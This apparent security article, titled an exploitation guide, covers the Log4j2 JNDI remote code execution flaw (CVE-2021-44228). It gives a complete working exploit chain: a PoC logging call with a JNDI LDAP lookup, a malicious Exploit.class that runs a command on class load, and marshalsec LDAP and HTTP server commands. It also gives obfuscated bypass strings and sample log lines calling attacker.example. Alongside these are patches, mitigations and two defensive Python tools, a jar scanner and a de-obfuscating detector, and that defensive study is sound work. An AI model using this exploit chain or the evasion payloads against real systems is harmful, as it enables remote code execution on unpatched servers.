Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide
This article introduces Apache Log4j2, explains the remote code execution vulnerability caused by unsafe JNDI lookups, provides step‑by‑step environment setup, PoC code, exploitation instructions, and outlines official patches and temporary mitigation measures for developers and security engineers.
1. Introduction: Apache Log4j2 is an open‑source Java logging framework widely used in middleware, development frameworks and web applications.
2. Vulnerability Overview: Log4j2 performs string substitution ("lookups") on log messages while formatting them, and its JNDI lookup, ${jndi:...}, fetches and instantiates an object from whatever LDAP or RMI server the string names. Because the substitution runs on the formatted message, any attacker-controlled text that reaches a log call (a request header, a username, a search query) can carry the lookup; an unauthenticated attacker who gets such a string logged obtains arbitrary code execution on the target server (CVE-2021-44228).
3. Affected Versions: Apache Log4j 2.x from 2.0-beta9 up to and including 2.14.1; the first fix candidate, 2.15.0-rc1, could still be bypassed (see section 9), so the page's stated range is 2.x <= 2.15.0-rc1.
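An added helper, written for this article rather than taken from it, that applies the affected-version range above to deployed artifacts: it reads the log4j-core version from the jar's Maven pom.properties, checks whether the JndiLookup class is present (the class whose removal is a recognised workaround), and descends into jars nested inside fat or Spring Boot jars. The fixture jar it builds is constructed for the example (a fake log4j-core 2.14.1 containing an empty placeholder class) and is not a real Log4j artifact, and the version range encodes exactly what this section states (2.x up to 2.15.0-rc1); a scanner used in practice should widen that range to cover the later advisories.

```python
import io
import os
import tempfile
import zipfile
from typing import List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version: str) -> Tuple[Tuple[int, ...], str]:
    """'2.14.1' -> ((2, 14, 1), ''); '2.15.0-rc1' -> ((2, 15, 0), 'rc1')."""
    base, _, tag = version.partition("-")
    nums = tuple(int(p) for p in base.split(".") if p.isdigit())
    return nums + (0,) * (3 - len(nums)), tag


def is_affected(version: str) -> bool:
    """The range this section gives: Log4j 2.x up to and including 2.15.0-rc1."""
    nums, tag = parse_version(version)
    if not nums or nums[0] != 2:
        return False
    if nums < (2, 15, 0):
        return True
    return nums == (2, 15, 0) and tag == "rc1"


def verdict(version: Optional[str], has_jndi_lookup: bool) -> Optional[bool]:
    """True = vulnerable, False = not, None = version unknown, inspect manually."""
    if not has_jndi_lookup:      # class removed from the jar: the lookup cannot be reached
        return False
    if version is None:
        return None
    return is_affected(version)


def inspect_jar(data: bytes, name: str, findings: list) -> None:
    """Append (path, version, has JndiLookup, verdict) for this jar and any jar nested in it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_lookup = JNDI_LOOKUP_CLASS in names
        if version is not None or has_lookup:
            findings.append((name, version, has_lookup, verdict(version, has_lookup)))
        for inner in sorted(names):   # fat jars (Spring Boot, WAR, EAR) bundle log4j-core inside
            if inner.endswith((".jar", ".war", ".ear")):
                inspect_jar(zf.read(inner), f"{name}!/{inner}", findings)


def scan_path(path: str) -> List[Tuple[str, Optional[str], bool, Optional[bool]]]:
    findings: list = []
    with open(path, "rb") as f:
        inspect_jar(f.read(), path, findings)
    return findings


def build_sample_jar() -> str:
    """Constructed fixture, not a real Log4j artifact: an application jar that bundles
    a fake log4j-core 2.14.1 whose JndiLookup.class is an empty placeholder."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                                   "artifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_LOOKUP_CLASS, b"")
    path = os.path.join(tempfile.mkdtemp(), "app.jar")
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
        z.writestr("BOOT-INF/classes/App.class", b"")
    return path


if __name__ == "__main__":
    for entry in scan_path(build_sample_jar()):
        print(entry)
```

A jar that carries the JndiLookup class but no pom.properties (shaded or repackaged builds) is reported with verdict None rather than silently passed, which is the case that automated scanners most often miss.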
4. Environment Setup: Create a new Maven project and add the log4j-core dependency. The PoC uses 2.14.1, the last release before the fix:
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.1</version>
    </dependency>
5. Exploit PoC:
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Vulnerable logging call: the message contains a JNDI lookup that
// Log4j2 (<= 2.14.1) resolves while formatting the message.
class LogTest {
    public static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // In a real attack this string arrives in attacker-controlled input,
        // for example a User-Agent header that the application logs.
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}
6. Compile the malicious class Exploit.class (its static initializer runs as soon as the class is loaded):
class Exploit {
    // Static initializer: executed when the victim's JNDI client loads this
    // class from the HTTP code base that the LDAP reference points to.
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc"; // command to run on the target (Windows calculator here)
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Compile it with javac exp.java (the source file is named exp.java on the page; because the class is not public, javac still emits Exploit.class). Then serve the directory containing Exploit.class over plain HTTP on port 7777, for example with python3 -m http.server 7777: the LDAP server started next only returns a reference to that code base, and the victim JVM fetches the class from it.
7. Start a local LDAP server using marshalsec:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888
The first argument is the HTTP code base and class name that the LDAP reference points to; the last argument, 8888, is the LDAP listening port and matches the port in the PoC's lookup string.
8. Run the PoC Java program. Log4j2 resolves the lookup, the JNDI client connects to the malicious LDAP server on port 8888, follows the returned reference to http://127.0.0.1:7777/Exploit.class, loads the class, and its static initializer executes the embedded command (here, launching the calculator). "Pwned" on the PoC's stderr confirms that the class was loaded. This remote class loading succeeds only when the victim JVM still permits JNDI URL code bases (com.sun.jndi.ldap.object.trustURLCodebase), which is why the JDK versions listed under the fixes matter.
9. Bypass notes: The fix in 2.15.0-rc1 restricted JNDI lookups, but a lookup whose URI is malformed could still reach the JNDI code path and bypass the restriction; in addition, other StrLookup variants such as ${lower:...} and ${upper:...} can be nested around the jndi keyword to evade naive string matching in filters. The rc1 bypass was fixed in 2.15.0-rc2.
10. Fixes: Upgrade to a fixed Log4j2 release. The page's fix is 2.15.0-rc2 or newer; later releases (2.16.0 and 2.17.x) disable message lookups and JNDI by default and address follow-up issues found in 2.15.0, so the newest 2.17.x or later release is the right upgrade target. Where an immediate upgrade is not possible, apply the following temporary mitigations and keep their limits in mind:
Add the JVM option -Dlog4j2.formatMsgNoLookups=true (honoured only by Log4j2 2.10.0 and later; older versions silently ignore it).
Place a log4j2.component.properties file on the classpath containing log4j2.formatMsgNoLookups=true (same version limit as above).
Use JDK 11.0.1, 8u191, 7u201, 6u211 or later. These versions default com.sun.jndi.ldap.object.trustURLCodebase to false, which blocks the remote class loading used by this PoC, but they do not stop the JNDI lookup itself: the lookup still reaches the attacker's server (leaking data such as environment values embedded in the lookup) and can be exploited through deserialization of a returned object when suitable gadget classes are on the classpath, so this alone is not a complete fix.
Deploy a WAF or other third-party firewall product as an additional layer, for defence in depth only: obfuscated lookup strings (nested ${lower:...}, ${upper:...} and ${...:-x} lookups) evade simple pattern matches.
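Added example (not from the original article) of the detection logic a WAF rule or log review needs for the obfuscated variants mentioned in sections 9 and 10: it resolves the nested ${lower:...}, ${upper:...} and ${name:-default} lookups that attackers wrap around the jndi keyword, the way Log4j2's own substitution would, and then flags every ${jndi:...} lookup left in the normalised text. The access-log lines are constructed for the example and attacker.example is a placeholder host.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j2 lower-cases the lookup prefix, so "jndi" must be matched case-insensitively.
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _evaluate(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body the way Log4j2's StrSubstitutor does.

    Covers the lookups used for obfuscation: ${lower:x}, ${upper:x} and the
    ${name:-default} fallback (so ${::-j} becomes "j").  Returns None for
    lookups that cannot be resolved offline (jndi, env, sys, date, ...).
    """
    name, sep, default = body.partition(":-")
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if sep:                      # unresolvable name with a default value
        return default
    return None


def resolve_lookups(text: str, max_passes: int = 50) -> str:
    """Substitute innermost lookups repeatedly until the text stops changing.

    Unresolved lookups are left in place, so a ${jndi:...} survives for the
    caller to match; max_passes bounds the work on pathological input.
    """
    for _ in range(max_passes):
        def repl(m):
            value = _evaluate(m.group(1))
            return m.group(0) if value is None else value
        new_text = INNERMOST.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi(text: str) -> List[str]:
    """Return every ${jndi:...} lookup present after de-obfuscation."""
    return JNDI.findall(resolve_lookups(text))


def scan_log(lines) -> List[Tuple[int, str]]:
    """(line number, resolved lookup) for each JNDI lookup found in the lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        for lookup in find_jndi(line):
            hits.append((number, lookup))
    return hits


if __name__ == "__main__":
    for number, lookup in scan_log(SAMPLE_LINES):
        print(f"line {number}: {lookup}")
```

Run it on input after URL decoding (and after any other decoding the application applies before logging), since the substitution only sees the text Log4j2 sees; a plain count of "${" occurrences in request fields is a useful coarser alarm alongside it.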
Architecture Digest